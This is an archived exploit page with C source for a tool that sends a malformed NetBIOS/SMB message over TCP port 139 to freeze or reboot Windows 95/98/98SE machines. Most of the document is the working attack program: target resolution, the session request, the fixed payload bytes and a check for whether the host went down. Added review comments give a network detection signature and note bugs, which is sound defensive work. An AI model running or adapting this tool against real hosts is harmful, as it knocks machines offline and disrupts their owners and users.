
kpr-winkill.c

kpr-winkill.c
Posted Nov 14, 2003
Authored by Koper

Microsoft Windows 95/98/98SE denial of service utility that uses malformed NetBIOS packets to lock up and reboot the machine.

tags | denial of service
systems | windows
SHA-256 | 926d171c8c658d8861fb0067abda1bc605fcc9caf1e0a70a1986947d8c097432

kpr-winkill.c

/*

Windows 95,98 and 98SE Denial Of Service.
by koper <koper@linuxmail.org>


Uses malformed NetBIOS packets
to freeze/reboot the remote machine.

Don't abuse ... @least not 2much

;>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 139 // NetBIOS session service port ... goes without saying ;)

/*
 * Fixed request bytes that main() sends once the session request has been
 * accepted. Visible layout: a 4-byte session header (00 00 00 41), the SMB
 * signature FF 'S' 'M' 'B', the command byte 0xd0 (SMB_COM_SEND_MESSAGE in
 * the CIFS command table -- confirm), a run of zero bytes, and then short
 * ASCII strings ("BEAV", "BEAVIS" and a line of text).
 *
 * The initializer is 106 bytes long (plus the implicit terminating NUL), but
 * main() writes only the first 72 bytes of it.
 *
 * For detection: the sequence is constant, so the session header followed by
 * the SMB signature and the 0xd0 command byte on TCP/139 is a usable match
 * for a network signature on segments where Windows 9x hosts still exist.
 */
char kprcode[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a";

struct samba_req
{
char first[5];
char yourname[32];
char sep[2];
char myname[32];
char end[1];
};

/* Encodes name1 into name2 as 32 letters plus a terminating NUL (33 bytes). */
void name(char *name1, char *name2);

/* Turns a dotted-quad string or host name into the value main() stores in sin_addr.s_addr. */
unsigned long int dns (char *host);

/*
 * Entry point. Expects <IP> and <NetBIOS name> on the command line, opens a
 * TCP connection to PORT on that host, sends a session request built in a
 * struct samba_req, and if the reply starts with 0x82 sends the first 72
 * bytes of kprcode. It then attempts a second connection and reports the
 * host as down when that connect fails.
 *
 * Seen from the network, the run is: TCP connect to port 139, a 72-byte
 * session request starting 81 00 00 44 20, then 72 bytes starting
 * 00 00 00 41 FF 'S' 'M' 'B' d0, then a new connection attempt.
 */
int main(int argc, char *argv[]){
/* myname/yourname are 33 bytes because name() writes 32 letters plus a NUL. */
char buf[4000], buf2[4000], myname[33], yourname[33];
struct sockaddr_in piggie;
int soc, soc2, connex, x, x2;
struct samba_req smbreq;
long temp;

printf("\n******************************************************\n");
printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
printf("* \t by koper <koper@linuxmail.org> *\n");
printf("******************************************************\n");
printf(" Version: 0.5 - Support for Windows 98 SE\n\n");

if (argc < 3) {
printf("Usage: %s <IP> <NetBIOS name>\n", argv[0]);
printf("NetBIOS name must be in uppercase!\n");
exit(1);}


/*
 * Positions 30-31 hold the encoding of the 16th name byte. Under the nibble
 * mapping used by name() ('A' + nibble), "AD" stands for the byte 0x03.
 * NOTE(review): 0x03 is presumably the Messenger-service name type -- confirm.
 */
name("KPR",myname);
myname[30]='A';
myname[31]='D';

name(argv[2],yourname);
yourname[30]='A';
yourname[31]='D';
printf("[+] Trying %s as NetBIOS name %s...\n",argv[1],argv[2]);
printf("[+] Resolving...\n");
/* NOTE(review): temp is never read; dns() is simply called a second time below. */
temp = dns(argv[1]);

/* NOTE(review): piggie is not zeroed first, so its remaining members are indeterminate. */
piggie.sin_addr.s_addr = dns(argv[1]);
piggie.sin_family = AF_INET;
piggie.sin_port = htons(PORT);

printf("[+] %s resolved: OK...\n", argv[1]);
/* NOTE(review): the result of socket() is not checked before connect(). */
soc = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(soc,(struct sockaddr *)&piggie,sizeof(piggie)))<0){ perror("[+] Error"); exit(1);}

memset(buf,0,4000);
memset(buf2,0,4000);

/* Fill the 72-byte request field by field; every byte of smbreq is assigned here. */
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5);
memcpy(smbreq.sep,"\x00\x20",2);
memcpy(smbreq.end,"\x00",1);
/* The fields are exactly 32 bytes, so strncpy copies the 32 letters and no NUL. */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yourname,yourname,32);

/* NOTE(review): the write() result is ignored; a short write is not detected. */
write(soc,&smbreq,72);
x=read(soc,buf,4000);

if(x<1){ printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
exit(1);}

/* Only a reply whose first byte is 0x82 is treated as acceptance of the session request. */
if(buf[0]=='\x82') {
printf("[+] Got responce from remote host...\n");
printf("[+] Initialising attack...\n");}
else {printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n"); exit(1);}

/* Sends the first 72 bytes of kprcode; the rest of the array is never transmitted. */
write(soc,&kprcode,72);
x=read(soc,buf,4000);
close(soc);
printf("[+] Packet SENT!\n");
printf("[+] Checking hostname...\n");

/*
 * NOTE(review): soc was closed just above, so this write()/read() pair acts on
 * a closed descriptor; the results (x2, buf2) are not used afterwards.
 */
write(soc,&smbreq,72);
x2=read(soc,buf2,4000);

/*
 * The verdict rests only on whether a fresh connect() succeeds.
 * NOTE(review): a failed connect can have other causes (filtering, a transient
 * network error), so "Host is down" is not proof of a crash. soc2 is never
 * closed and its socket() result is not checked.
 */
soc2=socket(AF_INET,SOCK_STREAM,0);
if(connect(soc2,(struct sockaddr *)&piggie,sizeof(piggie))<0)
printf("[+] Host is down... YEAH!\n\n");
else printf("[+] %s is still up, probably not vulnerable...\n\n",argv[1]);
}

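/*
 * Encode a name into the 32-letter half-byte form used in the session
 * request: each input byte becomes two letters, 'A' + high nibble followed
 * by 'A' + low nibble.
 *
 * name1  NUL-terminated input; only the first 16 bytes are used. Shorter
 *        names are padded with the space character (0x20), which encodes
 *        as "CA".
 * name2  output buffer of at least 33 bytes: 32 letters plus a NUL.
 *
 * Bytes are handled as unsigned char. With a plain (possibly signed) char a
 * byte >= 0x80 would produce negative quotients and remainders, and the
 * result would fall outside 'A'..'P'.
 * If either pointer is NULL the function returns without writing anything.
 */
void name(char *name1, char *name2)
{
    size_t len;
    size_t i;

    if (name1 == NULL || name2 == NULL)
        return;

    len = strlen(name1);
    for (i = 0; i < 16; i++) {
        /* Past the end of the input, encode the space padding byte. */
        unsigned char c = (i < len) ? (unsigned char)name1[i] : 0x20;

        name2[i * 2] = (char)('A' + (c >> 4));
        name2[i * 2 + 1] = (char)('A' + (c & 0x0F));
    }
    name2[32] = '\0';
}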


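/*
 * Resolve host to an IPv4 address in network byte order.
 *
 * host  dotted-quad string or host name.
 *
 * Returns the 32-bit address widened to unsigned long, ready to be stored in
 * sin_addr.s_addr. If the name cannot be resolved to an IPv4 address, prints
 * a message and terminates the process with status 1, matching the error
 * exits in main().
 *
 * Changes from the earlier version of this function:
 *  - the parsed dotted-quad value is now returned; before, that path ran off
 *    the end of the function without a return statement;
 *  - the address is copied with memcpy into a 32-bit in_addr_t instead of
 *    being read through an unsigned long pointer, which reads 8 bytes from a
 *    4-byte address where long is 64 bits wide;
 *  - failure of inet_addr() is tested against INADDR_NONE rather than -1 held
 *    in a long, which never matches a 32-bit unsigned result on such systems.
 */
unsigned long int dns (char *host)
{
    in_addr_t addr;
    struct hostent *he;

    if (host != NULL) {
        /*
         * "255.255.255.255" is indistinguishable from INADDR_NONE and is
         * therefore passed on to the resolver like any other name.
         */
        addr = inet_addr(host);
        if (addr != INADDR_NONE)
            return (unsigned long)addr;

        he = gethostbyname(host);
        if (he != NULL && he->h_addrtype == AF_INET
            && he->h_length == (int)sizeof addr
            && he->h_addr_list != NULL && he->h_addr_list[0] != NULL) {
            memcpy(&addr, he->h_addr_list[0], sizeof addr);
            return (unsigned long)addr;
        }
    }

    printf("[+] Unable to resolve %s...\n[+] Panic!\n", host ? host : "(null)");
    exit(1);
}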